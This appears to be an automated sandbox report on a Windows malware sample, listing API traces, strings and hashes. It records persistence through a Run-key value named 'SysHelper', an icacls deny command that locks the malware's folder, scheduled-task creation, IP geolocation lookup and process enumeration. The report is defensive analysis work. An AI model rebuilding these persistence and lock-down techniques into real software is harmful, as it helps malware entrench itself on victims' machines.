                                                                                                                            • VariantInit.OLEAUT32(?), ref: 0046D309
                                                                                                                            • VariantInit.OLEAUT32(?), ref: 0046D322
                                                                                                                            • VariantInit.OLEAUT32(?), ref: 0046D33B
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 0046D397
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 0046D3A4
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 0046D3B1
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 0046D3C2
                                                                                                                            • CoUninitialize.OLE32 ref: 0046D3D5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
                                                                                                                            • String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
                                                                                                                            • API String ID: 2496729271-1738591096
                                                                                                                            • Opcode ID: 948338f76f259f8bf93fb4b392236aba06ec26a455e620ba0f9e3a49e74cfd62
                                                                                                                            • Instruction ID: 37aa648fc3d232e7746c5c1b5da7931a9f3c2bfbc162019e14d9173ef1701682
                                                                                                                            • Opcode Fuzzy Hash: 948338f76f259f8bf93fb4b392236aba06ec26a455e620ba0f9e3a49e74cfd62
                                                                                                                            • Instruction Fuzzy Hash: 4B527F70E00219DFDB10DFA5C848FAEBBB5FF49304F148199E505AB251EB34AD46CBA6
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetCommandLineW.KERNEL32 ref: 00472235
                                                                                                                            • CommandLineToArgvW.SHELL32(00000000,?), ref: 00472240
                                                                                                                            • PathFindFileNameW.SHLWAPI(00000000), ref: 00472248
                                                                                                                            • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00472256
                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0047226A
                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00472275
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00472280
                                                                                                                            • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00472291
                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0047229F
                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004722AA
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004722B5
                                                                                                                            • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 004722CD
                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,?), ref: 004722FE
                                                                                                                            • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00472315
                                                                                                                            • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 0047232C
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00472347
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                                                                                                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                                                                                                                            • API String ID: 3668891214-3807497772
                                                                                                                            • Opcode ID: 2656100bc6066429cacfda1697eab721c899b79fd40737a213d1aebb886953ec
                                                                                                                            • Instruction ID: 221d24195813059d9f7e054a1b11b0153e51f2007fe3ad0ab9dcd21e75ba10bc
                                                                                                                            • Opcode Fuzzy Hash: 2656100bc6066429cacfda1697eab721c899b79fd40737a213d1aebb886953ec
                                                                                                                            • Instruction Fuzzy Hash: 26315271E00219ABDB10AFA58C45EEFBBB8FF55705F00446AF904E3250EBB49E059FA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0046CF4A
                                                                                                                            • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0046CF5F
                                                                                                                            • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0046CFA6
                                                                                                                            • InternetReadFile.WININET(00000000,?,00002800,?), ref: 0046CFCD
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0046CFDA
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0046CFDD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Internet$CloseHandleOpen$FileRead_memset
                                                                                                                            • String ID: $"country_code":"$$$($Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                                                                                                                            • API String ID: 1485416377-933853286
                                                                                                                            • Opcode ID: b37e613185fdaf336fd1cc1c06fb724c7df7957baad608be6254c22768effed2
                                                                                                                            • Instruction ID: c14736529394499541c8d56160f7d7a3784d11cf2b20a6b4a897974c3928d28a
                                                                                                                            • Opcode Fuzzy Hash: b37e613185fdaf336fd1cc1c06fb724c7df7957baad608be6254c22768effed2
                                                                                                                            • Instruction Fuzzy Hash: E591C371D00248EBEF20DFA0CD45BEEBBB4BF15708F20455AE4057B281E7BA5A49CB56
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,0052AC68,000000FF), ref: 00471D12
                                                                                                                            • _memset.LIBCMT ref: 00471D3B
                                                                                                                            • RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00471D63
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0052AC68,000000FF), ref: 00471D6C
                                                                                                                            • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00471DD6
                                                                                                                            • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00471E48
                                                                                                                            • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00471E99
                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00471EA5
                                                                                                                            • GetCommandLineW.KERNEL32 ref: 00471EB4
                                                                                                                            • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00471EBF
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 00471ECE
                                                                                                                            • PathFindFileNameW.SHLWAPI(?), ref: 00471EDB
                                                                                                                            • UuidCreate.RPCRT4(?), ref: 00471EFC
                                                                                                                            • UuidToStringW.RPCRT4(?,?), ref: 00471F14
                                                                                                                            • RpcStringFreeW.RPCRT4(00000000), ref: 00471F64
                                                                                                                            • PathAppendW.SHLWAPI(?,?), ref: 00471F83
                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00471F8E
                                                                                                                            • PathAppendW.SHLWAPI(?,?,?,?), ref: 0047202D
                                                                                                                            • DeleteFileW.KERNEL32(?), ref: 00472036
                                                                                                                            • CopyFileW.KERNEL32(?,?,00000000), ref: 0047204C
                                                                                                                            • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 0047206E
                                                                                                                            • _memset.LIBCMT ref: 00472090
                                                                                                                            • lstrcpyW.KERNEL32(?,005602FC), ref: 004720AA
                                                                                                                            • lstrcatW.KERNEL32(?,?), ref: 004720C0
                                                                                                                            • lstrcatW.KERNEL32(?," --AutoStart), ref: 004720CE
                                                                                                                            • lstrlenW.KERNEL32(?), ref: 004720D7
                                                                                                                            • RegSetValueExW.KERNEL32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 004720F3
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 004720FC
                                                                                                                            • _memset.LIBCMT ref: 00472120
                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 00472146
                                                                                                                            • lstrcpyW.KERNEL32(?,icacls "), ref: 00472158
                                                                                                                            • lstrcatW.KERNEL32(?,?), ref: 0047216D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
                                                                                                                            • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                                                                                                                            • API String ID: 2589766509-1182136429
                                                                                                                            • Opcode ID: c65a4599d94957638bf2337ed19a9afd74271cc3587a46c835a3097e16c613ea
                                                                                                                            • Instruction ID: 6fa5f262b01b05fbd2709d1527e0c51e15416143bd43534c892a36d535dda116
                                                                                                                            • Opcode Fuzzy Hash: c65a4599d94957638bf2337ed19a9afd74271cc3587a46c835a3097e16c613ea
                                                                                                                            • Instruction Fuzzy Hash: 6EE1AF71D00219ABDF24DBA0CD49FEFBBB8BF04304F1044AAE509A7191EB746A89CF54
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 004835B1
                                                                                                                              • Part of subcall function 00485208: __getptd_noexit.LIBCMT ref: 00485208
                                                                                                                            • __gmtime64_s.LIBCMT ref: 0048364A
                                                                                                                            • __gmtime64_s.LIBCMT ref: 00483680
                                                                                                                            • __gmtime64_s.LIBCMT ref: 0048369D
                                                                                                                            • __allrem.LIBCMT ref: 004836F3
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0048370F
                                                                                                                            • __allrem.LIBCMT ref: 00483726
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00483744
                                                                                                                            • __allrem.LIBCMT ref: 0048375B
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00483779
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1503770280-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 1060 487b0b-487b1a call 487ad7 ExitProcess
                                                                                                                            APIs
                                                                                                                            • ___crtCorExitProcess.LIBCMT ref: 00487B11
                                                                                                                              • Part of subcall function 00487AD7: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,i;H,00487B16,i;H,?,00488BCA,000000FF,0000001E,00567BD0,00000008,00488B0E,i;H,i;H), ref: 00487AE6
                                                                                                                              • Part of subcall function 00487AD7: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00487AF8
                                                                                                                            • ExitProcess.KERNEL32 ref: 00487B1A
                                                                                                                            Strings
                                                                                                                            Similarity
                                                                                                                            • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                            • String ID: i;H
                                                                                                                            • API String ID: 2427264223-4243722023
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 1063 483b4c-483b52 1064 483b61-483b64 call 480c62 1063->1064 1066 483b69-483b6c 1064->1066 1067 483b6e-483b71 1066->1067 1068 483b54-483b5f call 48793d 1066->1068 1068->1064 1071 483b72-483bb2 call 490d21 call 490eca call 490d91 1068->1071 1078 483bbb-483bbf 1071->1078 1079 483bb4-483bba call 482587 1071->1079 1079->1078
                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 00483B64
                                                                                                                              • Part of subcall function 00480C62: __FF_MSGBANNER.LIBCMT ref: 00480C79
                                                                                                                              • Part of subcall function 00480C62: __NMSG_WRITE.LIBCMT ref: 00480C80
                                                                                                                              • Part of subcall function 00480C62: RtlAllocateHeap.NTDLL(00A90000,00000000,00000001,?,?,?,?,00483B69,?), ref: 00480CA5
                                                                                                                            • std::exception::exception.LIBCMT ref: 00483B82
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00483B97
                                                                                                                              • Part of subcall function 00490ECA: RaiseException.KERNEL32(?,?,?,<yV,?,?,?,?,?,00483B9C,?,0056793C,?,00000001), ref: 00490F1F
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3074076210-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 1082 473a90-473ab0 1083 473ab2-473ab8 1082->1083 1084 473af8-473afd 1082->1084 1085 473b00-473b05 call 4af23e 1083->1085 1086 473aba-473ac2 call 483b4c 1083->1086 1090 473b0a-473b0f call 4af1bb 1085->1090 1089 473ac7-473ace 1086->1089 1089->1090 1091 473ad0-473ae0 1089->1091 1093 473af4-473af7 1091->1093 1094 473ae2-473af1 1091->1094 1093->1084 1094->1093
                                                                                                                            APIs
                                                                                                                            • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00473B0A
                                                                                                                              • Part of subcall function 00483B4C: _malloc.LIBCMT ref: 00483B64
                                                                                                                            Strings
                                                                                                                            Similarity
                                                                                                                            • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
                                                                                                                            • String ID: vector<T> too long
                                                                                                                            • API String ID: 657562460-3788999226
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 1096 48fb64-48fb77 call 488520 1099 48fb79-48fb8c call 488af7 1096->1099 1100 48fba5-48fbaa call 488565 1096->1100 1105 48fb99-48fba0 call 48fbab 1099->1105 1106 48fb8e call 48fe47 1099->1106 1105->1100 1109 48fb93 1106->1109 1109->1105
                                                                                                                            APIs
                                                                                                                            • __lock.LIBCMT ref: 0048FB7B
                                                                                                                              • Part of subcall function 00488AF7: __mtinitlocknum.LIBCMT ref: 00488B09
                                                                                                                              • Part of subcall function 00488AF7: __amsg_exit.LIBCMT ref: 00488B15
                                                                                                                              • Part of subcall function 00488AF7: EnterCriticalSection.KERNEL32(i;H,?,004850D7,0000000D), ref: 00488B22
                                                                                                                            • __tzset_nolock.LIBCMT ref: 0048FB8E
                                                                                                                              • Part of subcall function 0048FE47: __lock.LIBCMT ref: 0048FE6C
                                                                                                                              • Part of subcall function 0048FE47: ____lc_codepage_func.LIBCMT ref: 0048FEB3
                                                                                                                              • Part of subcall function 0048FE47: __getenv_helper_nolock.LIBCMT ref: 0048FED4
                                                                                                                              • Part of subcall function 0048FE47: _free.LIBCMT ref: 0048FF07
                                                                                                                              • Part of subcall function 0048FE47: _strlen.LIBCMT ref: 0048FF0E
                                                                                                                              • Part of subcall function 0048FE47: __malloc_crt.LIBCMT ref: 0048FF15
                                                                                                                            Similarity
                                                                                                                            • API ID: __lock$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock_free_strlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1282695788-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 1110 47cc50-47cc62 call 483b4c 1113 47cc64-47cc69 1110->1113 1114 47cc83-47cc88 call 4af1bb 1110->1114 1115 47cc71 1113->1115 1116 47cc6b-47cc6f 1113->1116 1118 47cc74-47cc7b 1115->1118 1116->1118 1120 47cc7f-47cc80 1118->1120 1121 47cc7d 1118->1121 1121->1120
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00483B4C: _malloc.LIBCMT ref: 00483B64
                                                                                                                            • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 0047CC83
                                                                                                                            Similarity
                                                                                                                            • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 657562460-0
                                                                                                                            • Opcode ID: 38c33b148a0880c22fef826a72848e8db45d7a5f4ef6098ecc29bd5a340866da
                                                                                                                            • Instruction ID: d35ec99b10942a5e784a732dd5713af3144c4dc4f3d765172cccd57d252ada6f
                                                                                                                            • Opcode Fuzzy Hash: 38c33b148a0880c22fef826a72848e8db45d7a5f4ef6098ecc29bd5a340866da
                                                                                                                            • Instruction Fuzzy Hash: F6E04F757402049FDB09EE52C491ABB77999BA2740B14C02EAC0E8B751EA34D90597A9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 1122 487f3d-487f47 call 487e0e 1124 487f4c-487f50 1122->1124
                                                                                                                            APIs
                                                                                                                            • _doexit.LIBCMT ref: 00487F47
                                                                                                                              • Part of subcall function 00487E0E: __lock.LIBCMT ref: 00487E1C
                                                                                                                              • Part of subcall function 00487E0E: DecodePointer.KERNEL32(00567B08,0000001C,00487CFB,00483B69,00000001,00000000,i;H,00487C49,000000FF,?,00488B1A,00000011,i;H,?,004850D7,0000000D), ref: 00487E5B
                                                                                                                              • Part of subcall function 00487E0E: DecodePointer.KERNEL32(?,00488B1A,00000011,i;H,?,004850D7,0000000D), ref: 00487E6C
                                                                                                                              • Part of subcall function 00487E0E: EncodePointer.KERNEL32(00000000,?,00488B1A,00000011,i;H,?,004850D7,0000000D), ref: 00487E85
                                                                                                                              • Part of subcall function 00487E0E: DecodePointer.KERNEL32(-00000004,?,00488B1A,00000011,i;H,?,004850D7,0000000D), ref: 00487E95
                                                                                                                              • Part of subcall function 00487E0E: EncodePointer.KERNEL32(00000000,?,00488B1A,00000011,i;H,?,004850D7,0000000D), ref: 00487E9B
                                                                                                                              • Part of subcall function 00487E0E: DecodePointer.KERNEL32(?,00488B1A,00000011,i;H,?,004850D7,0000000D), ref: 00487EB1
                                                                                                                              • Part of subcall function 00487E0E: DecodePointer.KERNEL32(?,00488B1A,00000011,i;H,?,004850D7,0000000D), ref: 00487EBC
                                                                                                                            Similarity
                                                                                                                            • API ID: Pointer$Decode$Encode$__lock_doexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2158581194-0
                                                                                                                            • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                                            • Instruction ID: cd31fe6ccee1c9104b14018fc3f0cb71c832b62b837260db633732b656dada53
                                                                                                                            • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                                            • Instruction Fuzzy Hash: B8B0927198420832DA113642AC03B193A085740A54F200061BA0C185A1A592A96041C9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetVersionExA.KERNEL32(00000094), ref: 004E1983
                                                                                                                            • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 004E1994
                                                                                                                            • LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 004E19A1
                                                                                                                            • LoadLibraryA.KERNEL32(NETAPI32.DLL), ref: 004E19AE
                                                                                                                            • GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 004E19E8
                                                                                                                            • GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 004E19FB
                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 004E1AC5
                                                                                                                            • GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 004E1ADB
                                                                                                                            • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 004E1AEE
                                                                                                                            • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 004E1B01
                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 004E1C15
                                                                                                                            • LoadLibraryA.KERNEL32(USER32.DLL), ref: 004E1C36
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 004E1C50
                                                                                                                            • GetProcAddress.KERNEL32(?,GetCursorInfo), ref: 004E1C63
                                                                                                                            • GetProcAddress.KERNEL32(?,GetQueueStatus), ref: 004E1C76
                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 004E1D45
                                                                                                                            • GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 004E1D73
                                                                                                                            • GetProcAddress.KERNEL32(?,CloseToolhelp32Snapshot), ref: 004E1D86
                                                                                                                            • GetProcAddress.KERNEL32(?,Heap32First), ref: 004E1D99
                                                                                                                            • GetProcAddress.KERNEL32(?,Heap32Next), ref: 004E1DAC
                                                                                                                            • GetProcAddress.KERNEL32(?,Heap32ListFirst), ref: 004E1DBF
                                                                                                                            • GetProcAddress.KERNEL32(?,Heap32ListNext), ref: 004E1DD2
                                                                                                                            • GetProcAddress.KERNEL32(?,Process32First), ref: 004E1DE5
                                                                                                                            • GetProcAddress.KERNEL32(?,Process32Next), ref: 004E1DF8
                                                                                                                            • GetProcAddress.KERNEL32(?,Thread32First), ref: 004E1E0B
                                                                                                                            • GetProcAddress.KERNEL32(?,Thread32Next), ref: 004E1E1E
                                                                                                                            • GetProcAddress.KERNEL32(?,Module32First), ref: 004E1E31
                                                                                                                            • GetProcAddress.KERNEL32(?,Module32Next), ref: 004E1E44
                                                                                                                            • GetTickCount.KERNEL32 ref: 004E1F03
                                                                                                                            • GetTickCount.KERNEL32 ref: 004E1FF1
                                                                                                                            • GetTickCount.KERNEL32 ref: 004E2066
                                                                                                                            • GetTickCount.KERNEL32 ref: 004E2095
                                                                                                                            • GetTickCount.KERNEL32 ref: 004E20FB
                                                                                                                            • GetTickCount.KERNEL32 ref: 004E2118
                                                                                                                            • GetTickCount.KERNEL32 ref: 004E2187
                                                                                                                            • GetTickCount.KERNEL32 ref: 004E21A4
                                                                                                                            Strings
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$CountTick$Library$Load$Free$Version
                                                                                                                            • String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
                                                                                                                            • API String ID: 842291066-1723836103
                                                                                                                            • Opcode ID: d57492a4036af6f0739f0679749cacee9b14a59b6f35e826d4760d5acbfa8a9f
                                                                                                                            • Instruction ID: cbd03a992584a4f3ec5e08c4616c2292859e86f30c5eface954cf06a3af9bf4d
                                                                                                                            • Opcode Fuzzy Hash: d57492a4036af6f0739f0679749cacee9b14a59b6f35e826d4760d5acbfa8a9f
                                                                                                                            • Instruction Fuzzy Hash: 8A3282B0E402699ADB209F65CC45B9FBA79FF45705F0041EBA60CE3291EB748E84CF59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • timeGetTime.WINMM(?,?,?,?,?,0052B3EC,000000FF), ref: 0047E6C0
                                                                                                                              • Part of subcall function 0046C6A0: RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 0046C6C2
